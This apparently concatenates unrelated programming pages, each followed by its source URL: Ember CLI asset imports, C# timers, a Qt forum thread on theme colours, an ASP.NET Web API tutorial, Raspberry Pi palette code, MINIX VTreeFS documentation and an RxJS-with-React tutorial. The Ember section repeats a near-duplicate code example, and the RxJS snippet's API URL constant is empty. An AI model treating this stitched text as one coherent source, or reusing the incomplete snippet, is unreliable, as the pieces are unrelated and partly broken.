Compiling Assets

When you're using dependencies that are not included in an addon, you will have to instruct Ember CLI to include your assets in the build. This is done using the asset manifest file ember-cli-build.js. You should only try to import assets located in the bower_components and vendor folders.
Globals provided by JavaScript assets

The globals provided by some assets (like moment in the example below) can be used in your application without the need to import them. Provide the asset path as the first and only argument. You will need to add "moment" to the predef section in .jshintrc to prevent JSHint errors.

AMD JavaScript modules

Provide the asset path as the first argument, and the list of modules and exports as the second. You can now import them in your app. (e.g. import { raw as icAjaxRaw } from 'ic-ajax';)

Environment Specific Assets

If you need to use different assets in different environments, specify an object as the first parameter. That object's key should be the environment name, and the value should be the asset to use in that environment. If you need to import an asset in only one environment, you can wrap app.import in an if statement. For assets needed during testing, you should also use the {type: 'test'} option to make sure they are available in test mode.

CSS

Provide the asset path as the first argument. All style assets added this way will be concatenated and output as /assets/vendor.css.

Other Assets

All assets located in the public/ folder will be copied as is to the final output directory, dist/. For example, a favicon located at public/images/favicon.ico will be copied to dist/images/favicon.ico. All third-party assets, included either manually in vendor/ or via a package manager like Bower, must be added via import(). Third-party assets that are not added via import() will not be present in the final build.

By default, imported assets will be copied to dist/ as they are, with the existing directory structure maintained. Importing the Font Awesome webfont this way would create the font file in dist/font-awesome/fonts/fontawesome-webfont.ttf. You can also optionally tell import() to place the file at a different path, for example copying the file to dist/assets/fontawesome-webfont.ttf instead.
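Putting these sections together, an ember-cli-build.js manifest could look something like the sketch below. The specific asset paths and module names are my assumptions for illustration, not prescribed by this guide:

```javascript
/* ember-cli-build.js */
var EmberApp = require('ember-cli/lib/broccoli/ember-app');

module.exports = function (defaults) {
  var app = new EmberApp(defaults, {});

  // Global-providing asset: the path is the only argument
  app.import('bower_components/moment/moment.js');

  // AMD asset: path plus the modules and exports it provides
  app.import('bower_components/ic-ajax/dist/amd/main.js', {
    exports: { 'ic-ajax': ['default', 'raw'] }
  });

  // Environment-specific asset: keys are environment names
  app.import({
    development: 'bower_components/lodash/dist/lodash.js',
    production: 'bower_components/lodash/dist/lodash.min.js'
  });

  // Asset needed only during testing
  app.import('bower_components/sinonjs/sinon.js', { type: 'test' });

  // CSS, concatenated into /assets/vendor.css
  app.import('bower_components/font-awesome/css/font-awesome.css');

  // Copy a file to a custom destination under dist/
  app.import('bower_components/font-awesome/fonts/fontawesome-webfont.ttf', {
    destDir: 'assets'
  });

  return app.toTree();
};
```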
If you need to load certain dependencies before others, you can set the prepend property equal to true on the second argument of import(). This will prepend the dependency to the vendor file instead of appending it, which is the default behavior.
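The import() variants described above can all be collected in the ember-cli-build.js manifest. The sketch below illustrates each one; moment, ic-ajax and the Font Awesome font come from the examples mentioned in the text, while the lodash and es5-shim paths are my own placeholders, not requirements:

```javascript
/* ember-cli-build.js — illustrative asset manifest */
var EmberApp = require('ember-cli/lib/broccoli/ember-app');

module.exports = function(defaults) {
  var app = new EmberApp(defaults, {});

  // A global-providing asset: `moment` becomes available application-wide.
  app.import('bower_components/moment/moment.js');

  // An AMD module: list the modules and their exports as the second argument.
  app.import('bower_components/ic-ajax/dist/amd/main.js', {
    exports: { 'ic-ajax': ['default', 'raw', 'request'] }
  });

  // Environment-specific assets, keyed by environment name.
  app.import({
    development: 'bower_components/lodash/lodash.js',
    production: 'bower_components/lodash/dist/lodash.min.js'
  });

  // A stylesheet, concatenated into /assets/vendor.css.
  app.import('bower_components/font-awesome/css/font-awesome.css');

  // A font file, copied to a custom location in dist/.
  app.import('bower_components/font-awesome/fonts/fontawesome-webfont.ttf', {
    destDir: 'assets'
  });

  // Load a dependency before everything else in the vendor file.
  app.import('bower_components/es5-shim/es5-shim.js', { prepend: true });

  return app.toTree();
};
```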
https://guides.emberjs.com/v2.9.0/addons-and-dependencies/managing-dependencies/
timer in C# / .NET examples

This page collects examples of working with timers in C# and the .NET Framework. Several timer types are available, each suited to different situations:

- System.Timers.Timer, from the System.Timers namespace: create a new Timer, set its interval, and handle its Elapsed event; to dispose of it indirectly, use a language construct such as using in C#.
- System.Threading.Timer: a lightweight timer that invokes a callback on a thread-pool thread.
- The Windows Forms Timer control: commonly used to update the UI periodically, for example displaying the current time in a Label control, or writing to a text file after a few seconds.

Common variations covered by the examples referenced here include adding a timer to a C# console application, building a countdown timer, measuring elapsed time with Stopwatch, and using a Timer control within a WinForm in Visual Studio.
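Distilling the System.Timers.Timer fragments above into a small, compilable C# console example (the one-second interval and the messages here are arbitrary choices, not part of the original page):

```csharp
using System;
using System.Timers;

class Program
{
    static void Main()
    {
        // Fire the Elapsed event every second until Enter is pressed.
        // The using block disposes of the timer when we are done with it.
        using (var timer = new Timer(1000))
        {
            timer.Elapsed += (sender, e) =>
                Console.WriteLine("Tick at {0:HH:mm:ss}", e.SignalTime);
            timer.AutoReset = true;  // keep firing repeatedly
            timer.Start();

            Console.WriteLine("Press Enter to quit.");
            Console.ReadLine();
        }
    }
}
```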
http://www.slipbay.com/timer-in-c-net-example/
Button Text not readable

As the title says, the button text is not visible at all. Only when I click on it am I able to see it, for a second.

Screenshot:

Code:

import QtQuick 2.6
import QtQuick.Controls 2.0
import QtQuick.Dialogs 1.2

Item {
    id: root
    width: 580
    height: 400

    SystemPalette { id: palette }
    clip: true

    MessageDialog {
        id: quitDialog
        text: "Do you wish to quit?"
        visible: false
        icon: StandardIcon.Question
        modality: Qt.ApplicationModal
        standardButtons: StandardButton.Yes | StandardButton.No
        onAccepted: Qt.quit()
        Component.onCompleted: visible = true
        onYes: Qt.quit()
        onNo: console.log("Not quitting")
    }
}

Any ideas why this is happening?

Pradeep Kumar:
Hi,
Just tried your code, and the text is visible for me when I ran it. I tried with Qt 5.8 and Qt 5.9 on Windows. Can you list your configuration?
Thanks,

Reply:
@Pradeep-Kumar Hey, the thing is my system has a dark theme (I am using KDE), but when I switch to a light theme, it shows the text. I am not really sure why this is happening. My system, if it helps: Linux Mint 18 KDE, Qt 5.9.

Pradeep Kumar:
Hmmm, ok, didn't try with Linux and the other theme settings; may be the native look and feel, I suppose. Will try with your configuration some time.
Thanks,

Reply:
Still I don't understand why this behaviour :/ . Does it automatically take the system theme and set colors accordingly?

Pradeep Kumar:
Need to check Qt classes for system settings and native look and feel, and for adopting those changes for the app.
Thanks,
https://forum.qt.io/topic/84342/button-text-not-readable
Code Focused

ASP.NET Web API allows you to write a service once and provide different output formats with little effort on the developer's side.

ASP.NET Web API is a new framework technology from Microsoft, due for release with the .NET Framework 4.5. It allows a single Web service to communicate with multiple clients in various formats such as XML, JSON and OData. IT organizations are looking to expose their functionality to a variety of clients. Although many protocols exist for communicating data on the Internet, HTTP seems to be dominating due to its ease of use and wide acceptance.

History of ASP.NET Web API

This new technology first emerged in October 2010 at the Microsoft Professional Developers Conference (PDC) with the release of Preview 1. At the time, it was called "WCF Web API." Since then the product has continued to evolve. Preview 6, released in November 2011, is the latest version. Shortly after the release of Preview 6, Microsoft announced the new name of ASP.NET Web API. The project is a joint effort between the WCF and ASP.NET teams to create an integrated Web API framework. ASP.NET Web API is available as a NuGet package for ASP.NET MVC 3, ASP.NET MVC 4 beta or ASP.NET applications, and it can be installed in a variety of ways. Unfortunately, Silverlight applications aren't supported at this time. However, HTTP resources can be consumed in Silverlight using HttpWebRequest. The WCF Web API and WCF support for jQuery content on the CodePlex site is ending and will be removed by the end of 2012.

Creating an HTTP Service

To demonstrate the powerful capabilities of ASP.NET Web API, I'll do a code walk-through. Let's assume I own a used car dealership and want to display my inventory to potential customers with various platforms (mobile, PC) or trading partners (wholesale dealers or distributors) using back-end services.
I'm going to create a service that will report all vehicles on-hand, and later allow the results to be queried and filtered. First, I'll create an ASP.NET MVC 3 solution called WebAPIDemo, as shown in Figure 1. I want to start with an empty project, so I'll select the Empty template and click OK, as shown in Figure 2. Next, I'll retrieve the latest NuGet package via the Package Manager in Visual Studio. I'll right-click on the solution in Solution Explorer, select Manage NuGet Packages and then enter WebApi.All in the search box. This retrieves the latest version of the package as shown in Figure 3. In this case, I have WebApi.All already installed so a green checkmark appears next to it. If it wasn't installed, an install button would be in place of the green checkmark. Clicking the install button next to WebApi.All in the center pane will start the installation. Accepting the necessary license agreements (see Figure 4) will continue the installation until completion, as shown in Figure 5. At this point, the project has all the necessary references in place to start coding. Figure 6 shows a view of Solution Explorer with the default files provided from the selected template. Next, I'll create a folder in the project and call it InventoryWebAPIs. I'll add a class to this folder and call it InventoryAPI.vb, as shown in Figure 7. The next step is to decorate the class with the <ServiceContract()> attribute. This will also require importing the namespace System.ServiceModel. The <ServiceContract()> attribute indicates to the ASP.NET Web API framework that this class will be exposed over HTTP. When finished, the class code will look similar to the following:

Imports System.ServiceModel

Namespace Inventory.APIs
    <ServiceContract()>
    Public Class InventoryAPI

    End Class
End Namespace

Now, the ASP.NET Web API needs to be hosted, which requires registering it as an ASP.NET route using the ServiceRoute method.
This is done in the global.asax.vb file by adding the following code to the RegisterRoutes method:

routes.Add(New ServiceRoute("InventoryWebAPIs/Inventory",
    New HttpServiceHostFactory(), GetType(InventoryAPI)))

The complete code is shown in Listing 1. Create a Resources folder in the project with a new InventoryDTO class within it. This Resources folder will hold the Data Transfer Object (DTO) to be passed to and from the ASP.NET Web API. The next step is to specify the "Start Action" for the project in the project properties. Because this is an ASP.NET MVC project, I'll specify the name of the class previously set up with the <ServiceContract()> attribute, class "Inventory." Please note, this class is in the folder InventoryWebAPIs, so it also needs to be specified for "Specific Page," as shown in Figure 8. If the class "InventoryWebAPIs/Inventory" isn't specified and the project is started, an HTTP 404 error will result. If the settings in my project are correct, I can start debugging my project and it will immediately render an XML form of the data, as shown in Figure 9.

Using the Built-In Test Client

Now that everything is working correctly, the next step is to use the built-in ASP.NET WCF test pages for fully testing the ASP.NET Web API. First, add Imports Microsoft.ApplicationServer.Http to global.asax.vb. Second, add an HttpConfiguration object, instantiate it, and set its EnableTestClient property to True. After making the necessary coding changes, I will start debugging the application by pressing F5. When the initial page loads, it will look similar to Figure 9. However, if I append "/test" to the URL, it displays the built-in test client, as shown in Figure 10. The test client page contains four sections. To use the test client, click the Resources link in the left pane. This will populate the "Request" section with verb, URI and content header. Clicking the Send button will result in the output seen in Figure 11.
The advantage of the test client is it expedites sending different content headers and verbs to the server. These are available in lists that appear when editing either the verb or the header, as shown in Figure 12. This allows the data to be sent in XML, JSON, plain text or any other format listed. Once the content header changes, ASP.NET Web API immediately adjusts to send the properly formatted output to the client.

Enabling OData Query Support

Another advantage of ASP.NET Web API is the ability to provide OData query support. Currently, only a subset of the query URI formats are accepted ($top, $skip, $orderby and $filter). To modify the existing API for OData support, simply change it to return an IQueryable type. This will also require using the System.Linq namespace. A complete listing of the modified code is shown in Listing 3. After making the necessary changes, the project is now ready to provide OData query support. Once the browser page loads, append the query string "?$top=2&$orderby=Model" to the address, click Send, and the modified query will be returned as shown in Figure 13.

Advantages of ASP.NET Web API

ASP.NET Web API is not fully released yet, but it still offers many promising features. It allows the ability to write a service once and provide many different output formats with little effort on the developer's side. This capability is made available in ASP.NET MVC 3, ASP.NET MVC 4 beta and standard ASP.NET applications. In addition, it offers a built-in test client to facilitate testing and viewing the data passed to and from the client.
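The article's Listing 3 is not reproduced here, but based on the description above, an IQueryable-returning service method might be sketched like this. The WebGet attribute usage and the InventoryDTO properties (Make, Model, Year) are assumptions for illustration, not taken from the article:

```vb
Imports System.Collections.Generic
Imports System.Linq
Imports System.ServiceModel
Imports System.ServiceModel.Web

Namespace Inventory.APIs
    <ServiceContract()>
    Public Class InventoryAPI

        ' Returning IQueryable(Of T) is what lets the framework apply
        ' $top, $skip, $orderby and $filter from the query string.
        <WebGet()>
        Public Function GetInventory() As IQueryable(Of InventoryDTO)
            ' Hypothetical in-memory data; a real service would query a store.
            Dim vehicles = New List(Of InventoryDTO) From {
                New InventoryDTO With {.Make = "Ford", .Model = "Focus", .Year = 2010},
                New InventoryDTO With {.Make = "Honda", .Model = "Civic", .Year = 2008},
                New InventoryDTO With {.Make = "Toyota", .Model = "Camry", .Year = 2011}
            }
            Return vehicles.AsQueryable()
        End Function
    End Class
End Namespace
```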
http://visualstudiomagazine.com/articles/2012/06/13/creating-an-http-service-with-web-api.aspx
I've also got this working in 32/24/16 and 8 bit colour modes. The multi-byte colour modes are relatively straightforward; 32 bpp is 10 bits each BGR with the top 2 bits (I assume) being used for alpha or something. 24 bpp is 8 bits each BGR, and 16 bpp is 5 bits each RGB with bit 0 ignored. The one thing that was puzzling me though was the 8 bit colour mode. It didn't seem to fall into any discernible pattern of RGB. Following some experimentation I found that white was represented by the value 0xD7 (215). Huh? After some more experimenting and searching the 'net I discovered that the 8 bit colour palette is 216 colours, which are also web-safe colours! This article confirmed my suspicions and inspired me to write the following function:

#define STANDARD_PALETTE_VAL_DIFF 51

unsigned int get_8bit_colour_index(unsigned int colour_24bit)
{
    const unsigned char standard_palette[] = { 0x00, 0x33, 0x66, 0x99, 0xCC, 0xFF };
    unsigned char result[3] = { 0x00, 0x00, 0x00 };

    for (int i = 0; i < 3; i++) {
        unsigned char c = colour_24bit & 0x000000FF;
        int pos = c / STANDARD_PALETTE_VAL_DIFF;

        if (c % STANDARD_PALETTE_VAL_DIFF != 0) {
            if (abs(c - standard_palette[pos]) > abs(c - standard_palette[pos + 1])) {
                pos += 1;
            }
        }

        result[i] = pos;
        colour_24bit = (colour_24bit >> 8);
    }

    return (result[0] * 36) + (result[1] * 6) + result[2];
}

What this does is take a standard 24 bit colour number (in BGR, remember) and find its nearest colour in the 216-colour palette, returning the index position of the colour. Of course by this point you're probably wondering why you'd use 8 bit colour. Well, it's easy - 1 byte per pixel - and it's fast. Perfect if you're planning on writing arcade style games. I'll be sharing my framebuffer and graphics code soon, just pm me if you'd like to get your hands on it now. V.
http://www.raspberrypi.org/phpBB3/viewtopic.php?f=72&p=221576
The VTreeFS library provides a common base that allows the rapid development of read-only, in-memory, hierarchical file systems. Originally designed to form the basis of both DevFS and ProcFS (still ongoing efforts), it is both flexible and easy to use. In essence, constructing a file system using VTreeFS consists of little more than implementing the appropriate callback hooks, and starting VTreeFS from the file system's main() function. Applications wishing to use VTreeFS must include the library's public header file, <minix/vtreefs.h>. They must link against the vtreefs library and the sys library, in that order ("-lvtreefs -lsys"), because VTreeFS uses functionality from syslib. An application that uses the library can add and remove directories and other files. All files (including directories) are represented using the primary object of the library: the inode. The library essentially manages a fully connected tree of inodes. API calls are provided to navigate the tree, and to retrieve and manipulate inode properties. The inode object itself is opaque to the application. Hard links are not supported, so every inode except the root inode is also an entry in its parent directory. The entry is identified in that directory by name. The names are bounded in length to save memory. VTreeFS is set up to be fairly "memory conscious" in general: the number of inodes to allocate has to be specified at start-up time by the application, and this set of inodes will be preallocated. It is not possible to create more inodes than this number. As a result, no dynamic memory allocation takes place once VTreeFS has finished initializing. To satisfy the requirements of ProcFS, an inode may also have an index associated with its entry in the directory. This optional index determines the inode's position when it is returned by a getdents() call.
This allows the application to guarantee that certain directory entries will show up in getdents() output exactly once, even if these entries are deleted and readded between getdents() calls. Indexed inodes have another property: if VTreeFS runs out of inodes, it will first try to delete unused indexed entries. Applications that use indexed entries are expected to recreate any needed indexed entries from their callback functions. This allows ProcFS to expose a dynamically generated tree that when fully expanded would by far exceed the number of preallocated inodes, while still being able to provide accurate views of any parts of this tree to the callers. Since indexed entries are very specific to ProcFS, further explanation on this subject is left out of this document. A typical file system will have no use for indexed entries, and simply specify NO_INDEX and zero indexed entries in inode creation calls. For reference, the VTreeFS header file is reproduced in its entirety here.

#ifndef _MINIX_VTREEFS_H
#define _MINIX_VTREEFS_H

struct inode;

typedef int index_t;
typedef void *cbdata_t;

#define NO_INDEX ((index_t) -1)

/* Maximum file name length, excluding terminating null character. It is set
 * to a low value to limit memory usage, but can be changed to any value.
 */
#define PNAME_MAX 24

struct inode_stat {
    mode_t mode;    /* file mode (type and permissions) */
    uid_t uid;      /* user ID */
    gid_t gid;      /* group ID */
    off_t size;     /* file size */
    dev_t dev;      /* device number (for char/block type files) */
};

struct fs_hooks {
    void (*init_hook)(void);
    void (*cleanup_hook)(void);
    int (*lookup_hook)(struct inode *inode, char *name, cbdata_t cbdata);
    int (*getdents_hook)(struct inode *inode, cbdata_t cbdata);
    int (*read_hook)(struct inode *inode, off_t offset, char **ptr,
        size_t *len, cbdata_t cbdata);
    int (*rdlink_hook)(struct inode *inode, char *ptr, size_t max,
        cbdata_t cbdata);
    int (*message_hook)(message *m);
};

extern struct inode *add_inode(struct inode *parent, char *name,
    index_t index, struct inode_stat *stat, index_t nr_indexed_entries,
    cbdata_t cbdata);
extern void delete_inode(struct inode *inode);

extern struct inode *get_inode_by_name(struct inode *parent, char *name);
extern struct inode *get_inode_by_index(struct inode *parent, index_t index);

extern char const *get_inode_name(struct inode *inode);
extern index_t get_inode_index(struct inode *inode);
extern cbdata_t get_inode_cbdata(struct inode *inode);

extern struct inode *get_root_inode(void);
extern struct inode *get_parent_inode(struct inode *inode);
extern struct inode *get_first_inode(struct inode *parent);
extern struct inode *get_next_inode(struct inode *previous);

extern void get_inode_stat(struct inode *inode, struct inode_stat *stat);
extern void set_inode_stat(struct inode *inode, struct inode_stat *stat);

extern void start_vtreefs(struct fs_hooks *hooks, unsigned int nr_inodes,
    struct inode_stat *stat, index_t nr_indexed_entries);

#endif /* _MINIX_VTREEFS_H */

add_inode adds an inode into a parent inode (which must be a directory), with the given name - a string that must consist of no more than PNAME_MAX characters. If the index parameter is not equal to NO_INDEX, it indicates the index position for the inode in the parent directory. The stat parameter points to a filled structure of inode metadata.
This structure's mode field determines the file type and the access permissions (see /usr/include/sys/stat.h); directories (S_IFDIR), regular files (S_IFREG), character-special files (S_IFCHR), block-special files (S_IFBLK), and symbolic links (S_IFLNK) are supported. The uid, gid, size and dev fields specify the owning user and group ID, the size of the inode, and the device number (for block and character special files), respectively. The nr_indexed_entries parameter is only used for new directories (S_IFDIR), and indicates the range (0 to nr_indexed_entries-1) reserved for inodes with index numbers; this value may be 0. delete_inode deletes the given inode from the tree. The actual deletion may be deferred if the inode is still open. It will then automatically be removed once it is closed, and no callback functions will be called on it in the meantime. Note that the file type of the inode must not be changed after creation. start_vtreefs starts the main loop of the vtree file system library, accepting requests from VFS and possibly other sources (passing those on to the application), and making the appropriate callbacks into the application based on the hooks given by the application. Due to limitations of the SEF framework, this API call never returns; when VTreeFS is instructed to shut down, it will exit by itself. The hooks parameter specifies a structure of function pointers; see the next section for details. The nr_inodes parameter specifies the maximum number of inodes, which will also be preallocated at startup. Upon being started, the vtreefs library has to create a root inode; the stat and nr_indexed_entries parameters of start_vtreefs() determine the initial parameters of this root inode. The fs_hooks structure that must be provided to the start_vtreefs call contains the following hook function pointers. init_hook is called when the file system is mounted. At this point, VTreeFS has initialized itself, and it is possible to add inodes to the tree.
cleanup_hook is called when the file system is unmounted. The application should use this function to perform any cleanup it wants to do itself, because this is always the last hook call before the entire process exits. lookup_hook is called when an entry is looked up in a directory. It allows the application to do, for example, the following things safely: create the requested inode on the fly, or decide that the requested entry should not exist. In the latter case, the hook implementation should return an error (typically ENOENT) to indicate that the lookup function should not continue; this is the error that will be returned to VFS. If OK is returned from the lookup function, the library continues the lookup. getdents_hook is called every time the contents of a directory are retrieved. read_hook is called every time part of a regular file is read. As a sidenote, while returning a pointer to the data may seem strange, this construction avoids the extra overhead of copying the data. rdlink_hook is called when a symbolic link is read, with a buffer of size max. The hook implementation can write a path name string of up to max bytes into ptr, including the terminating '\0' character. message_hook is called whenever the library's main loop receives a message that is an unsupported request from VFS, or a request not from VFS. The message parameter points to the message received. If the message was from VFS, the return value from the hook function will be used instead of ENOSYS when replying to VFS. If the message was not from VFS, it is fully up to the hook implementer to decide what to do with the message; the library will not send a reply by itself in this case. All hook pointers given in the fs_hooks structure may be NULL, in which case sensible defaults will be used. If a file system is mounted and unmounted more than once during its process lifetime (as is the case for ProcFS, for example), the init_hook and cleanup_hook hooks may be called more than once as well. The constructed tree is not destroyed at unmount time, so the init hook should be careful not to recreate nodes that already exist. This behavior is not ideal and may be changed later. Below is a very simple TestFS file system that makes use of VTreeFS to expose a single file called "test" which contains a textual representation of the current time.
TestFS consists of two files, Makefile and testfs.c, which must both be placed in the same directory. We start with the Makefile:

# Makefile for TestFS server
PROG=   testfs
SRCS=   testfs.c

DPADD+= ${LIBVTREEFS} ${LIBSYS}
LDADD+= -lvtreefs -lsys

MAN=

BINDIR?=    /sbin

.include <bsd.prog.mk>

Then testfs.c:

#include <minix/drivers.h>
#include <minix/vtreefs.h>
#include <sys/stat.h>
#include <string.h>
#include <time.h>
#include <assert.h>

static void my_init_hook(void)
{
    /* This hook will be called once, after VTreeFS has initialized. */
    struct inode_stat file_stat;
    struct inode *inode;

    /* We create one regular file in the root directory. The file is
     * readable by everyone, and owned by root. Its size as returned by for
     * example stat() will be zero, but that does not mean it is empty.
     * For files with dynamically generated content, the file size is
     * typically set to zero.
     */
    file_stat.mode = S_IFREG | 0444;
    file_stat.uid = 0;
    file_stat.gid = 0;
    file_stat.size = 0;
    file_stat.dev = NO_DEV;

    /* Now create the actual file. It is called "test" and does not have an
     * index number. Its callback data value is set to 1, allowing it to be
     * identified with this number later.
     */
    inode = add_inode(get_root_inode(), "test", NO_INDEX, &file_stat, 0,
        (cbdata_t) 1);

    assert(inode != NULL);
}

static int my_read_hook(struct inode *inode, off_t offset, char **ptr,
    size_t *len, cbdata_t cbdata)
{
    /* This hook will be called every time a regular file is read. We use
     * it to dynamically generate the contents of our file.
     */
    static char data[26];
    const char *str;
    time_t now;

    /* We have only a single file. With more files, cbdata may help
     * distinguishing between them.
     */
    assert((int) cbdata == 1);

    /* Generate the contents of the file into the 'data' buffer. We could
     * use the return value of ctime() directly, but that would make for a
     * lousy example.
     */
    time(&now);
    str = ctime(&now);
    strcpy(data, str);

    /* If the offset is beyond the end of the string, return EOF. */
    if (offset > strlen(data)) {
        *len = 0;

        return OK;
    }

    /* Otherwise, return a pointer into 'data'. If necessary, bound the
     * returned length to the length of the rest of the string. Note that
     * 'data' has to be static, because it will be used after this function
     * returns.
     */
    *ptr = data + offset;

    if (*len > strlen(data) - offset)
        *len = strlen(data) - offset;

    return OK;
}

/* The table with callback hooks. */
struct fs_hooks my_hooks = {
    my_init_hook,
    NULL,       /* cleanup_hook */
    NULL,       /* lookup_hook */
    NULL,       /* getdents_hook */
    my_read_hook,
    NULL,       /* rdlink_hook */
    NULL        /* message_hook */
};

int main(void)
{
    struct inode_stat root_stat;

    /* Fill in the details to be used for the root inode. It will be a
     * directory, readable and searchable by anyone, and owned by root.
     */
    root_stat.mode = S_IFDIR | 0555;
    root_stat.uid = 0;
    root_stat.gid = 0;
    root_stat.size = 0;
    root_stat.dev = NO_DEV;

    /* Now start VTreeFS. Preallocate 10 inodes, which is more than we'll
     * need for this example. No indexed entries are used.
     */
    start_vtreefs(&my_hooks, 10, &root_stat, 0);

    /* The call above never returns. This just keeps the compiler happy. */
    return 0;
}

From the directory that contains both these files, TestFS can be built with make and installed with make install. After installation, one more step is needed before TestFS can be mounted. TestFS is a system server, so it needs its own entry in /etc/system.conf. This entry can be very simple, because TestFS needs no privileges beyond those given to it by default. The entry should therefore look like this:

service testfs {
};

Now you should be able to mount TestFS:

mount -t testfs none /mnt

If everything worked as expected, a file called "test" should show up in /mnt now. If you issue cat /mnt/test, you will be presented with the current time. The time is renewed on every read.
Finally, TestFS can be unmounted again with the following command:

umount /mnt

This document is based heavily on the original VTreeFS design document, although that document is no longer updated with changes to VTreeFS.
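To complement the TestFS example, which leaves lookup_hook unset, here is a hypothetical sketch of a lookup hook that creates an entry on the fly; the exact hook signature and semantics should be checked against the actual <minix/vtreefs.h> in your MINIX tree:

```c
#include <minix/vtreefs.h>
#include <sys/stat.h>
#include <string.h>
#include <errno.h>

/* Hypothetical lookup hook: create a "hello" entry on the fly the first
 * time it is looked up in the given directory. */
static int my_lookup_hook(struct inode *parent, char *name, cbdata_t cbdata)
{
    struct inode_stat stat;

    /* Only the "hello" entry is allowed to exist in this directory. */
    if (strcmp(name, "hello") != 0)
        return ENOENT;

    /* If it was created by an earlier lookup, there is nothing to do. */
    if (get_inode_by_name(parent, name) != NULL)
        return OK;

    stat.mode = S_IFREG | 0444;
    stat.uid = 0;
    stat.gid = 0;
    stat.size = 0;
    stat.dev = NO_DEV;

    if (add_inode(parent, name, NO_INDEX, &stat, 0, NULL) == NULL)
        return ENOMEM;

    return OK;
}
```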
https://wiki.minix3.org/doku.php?id=releases:3.2.0:developersguide:vtreefs
RxJS with React
Adam L Barrett

RxJS and React go together like chocolate and peanut butter: great individually but they become something incredible when put together. A quick search on npm will find a slew of hooks to connect RxJS Observables to React components, but let's start at the beginning: RxJS and React fit very well together "as is" because they follow the same philosophy and have very compatible APIs.

A quick aside about why RxJS: RxJS is a mature, battle-hardened library for dealing with events and data flow. It is definitely going to be valuable to familiarize yourself with how it works.

Let's start with a simple example. We've got a simple List component here that just lists the strings it is given:

const source = ['Adam', 'Brian', 'Christine'];

function App() {
  const [names, setNames] = useState(source);
  return (
    <div className="App">
      <h1>RxJS with React</h1>
      <List items={names} />
    </div>
  );
}

(follow along on CodeSandbox!)

Now, let's pull those values from an RxJS Observable. Let's start by creating an Observable with the RxJS of() function. We'll need to:

- add rxjs as a dependency (npm i rxjs, yarn add rxjs or however you need to if you're not using CodeSandbox)
- import of from rxjs

Then let's create an Observable called names$, whose value is the source array:

import { of } from 'rxjs';

const source = ['Adam', 'Brian', 'Christine'];
const names$ = of(source);

FYI: I will be following the convention of naming an Observable variable with a $ suffix (aka Finnish Notation), which is completely optional but I think it may help for clarity while learning.

Now what we want to do is synchronize the component state with the state from the Observable. This would be considered a side-effect of the React function component App, so we are going to use the useEffect() hook, which we can import from react.
Inside the useEffect() callback we will:

- subscribe to the names$ Observable with the subscribe() method, passing our "state setter function" setNames as the observer argument
- capture the subscription returned from observable.subscribe()
- return a clean-up function that calls the subscription's .unsubscribe() method

function App() {
  const [names, setNames] = useState();

  useEffect(() => {
    const subscription = names$.subscribe(setNames);
    return () => subscription.unsubscribe();
  });

  return (
    <div className="App">
      <h1>RxJS with React</h1>
      <List items={names} />
    </div>
  );
}

Which at this point should look something like this: the concepts and APIs in RxJS and React are very compatible — note how useEffect aligns with an RxJS subscription and how the clean-up call is a perfect time to unsubscribe. You'll see a lot more of that "symbiosis" as we go on.

An aside about useEffect

When using useEffect to synchronize component state to some "outer" state, you must decide what state you want to sync with:

- All state
- No state
- Some select pieces of state

This is represented in the deps array, which is the second argument passed to useEffect. To use a quote from Ryan Florence:

useEffect(fn) // all state
useEffect(fn, []) // no state
useEffect(fn, [these, states])

So, in this instance we don't have any props or other state to sync with: we just want our names array to be whatever is the current value of our Observable. We just want to update our component state whenever the Observable's value changes, so we'll go with No State and throw in an empty array [] as the second argument.

useEffect(() => {
  const subscription = names$.subscribe(setNames);
  return () => subscription.unsubscribe();
}, []);

Creating a custom hook

It looks like we'll be using this pattern a lot:

- subscribing to an Observable in useEffect
- setting the state on any changes
- unsubscribing in the clean-up function

...so let's extract that behaviour into a custom hook called useObservable.
const useObservable = observable => {
  const [state, setState] = useState();

  useEffect(() => {
    const sub = observable.subscribe(setState);
    return () => sub.unsubscribe();
  }, [observable]);

  return state;
};

Our useObservable hook takes an Observable and returns the last emitted value of that Observable, while causing a re-render on changes by calling setState. Note that our state is initialized as undefined until some value is emitted in the Observable. We'll use that later, but for now, make sure the components can handle when the state is undefined. So we should have something like this now: of course, we could, and probably should, have useObservable() defined as an export from a module in its own file because it is shareable across components and maybe even across apps. But for our simple example today, we'll just keep everything in one file.

Adding some asynchronicity

So we've got this list of names showing now, but this is all very boring so far, so let's do something a little more asynchronous. Let's import interval from rxjs and the map operator from rxjs/operators. Then, let's use them to create an Observable that only adds a name to the list every second.

import { interval } from 'rxjs';
import { map } from 'rxjs/operators';

const source = ['Adam', 'Brian', 'Christine'];
const names$ = interval(1000).pipe(map(i => source.slice(0, i + 1)));

Neat. So we can see our list appearing one at a time. Sort of useless, but off to a good start. 😄

Fetching some data

Instead of our source array, let's fetch the list of names from an API. The API endpoint we'll be using comes from randomuser.me, which is a nice service for just getting some made up user data. I'll add these 2 helper variables, api and getName, which will allow us to fetch 5 users at a time; the function will help extract the name from the user data randomuser.me provides.
const api = ``;
const getName = user => `${user.name.first} ${user.name.last}`;

RxJS has some great utility functions for fetching data, such as fromFetch and webSocket, but since we are just getting some JSON from an ajax request, we'll be using the RxJS ajax.getJSON method from the rxjs/ajax module.

import { ajax } from 'rxjs/ajax';

const names$ = ajax
  .getJSON(api)
  .pipe(map(({ results: users }) => users.map(getName)));

This will fetch the first 5 users from the API and map over the array to extract the name from the name.first and name.last property on each user. Now our component is rendering the 5 names from the API, yay!

It's interesting to note here that, since we moved our code into a custom hook, we haven't changed the component code at all. When you decouple the data from the display of the component like this, you get certain advantages. For example, we could hook up our Observable to a websocket for live data updates, or even do polling in a web worker, but the component doesn't need to change; it is happy rendering whatever data it is given, and the implementation of how the data is retrieved is isolated from the display on the page.

Aside about RxJS Ajax

One of the great benefits of using the RxJS ajax module (as well as fromFetch) is that request cancellation is built right in. Because our useObservable hook unsubscribes from the Observable in the clean-up function, if our component was ever "unmounted" while an ajax request was in flight, the ajax request would be cancelled and setState would never be called. It is a great memory-safe feature built in without needing any extra effort. RxJS and React working great together, out of the box, again.

Actions

So now we have this great custom hook for reading state values off an Observable. Those values can come from anywhere, asynchronously, into our component, and that is pretty good, but React is all about Data Down and Actions Up (DDAU).
We've really only got the data half of that covered right now, what about the actions? In the next instalment of the series we'll explore Actions, how we model our RxJS integration after the built-in useReducer hook, and much much more.

If you have any questions, feel free to post in the comments, or you can join our Bitovi community Slack at, and ask me directly. There are lots of other JavaScript experts there too, and it is a great place to ask questions or get some help.

My React stack for 2019
Since several people recently asked me to share my ideal React stack, I decided to write it down and share it also with you.

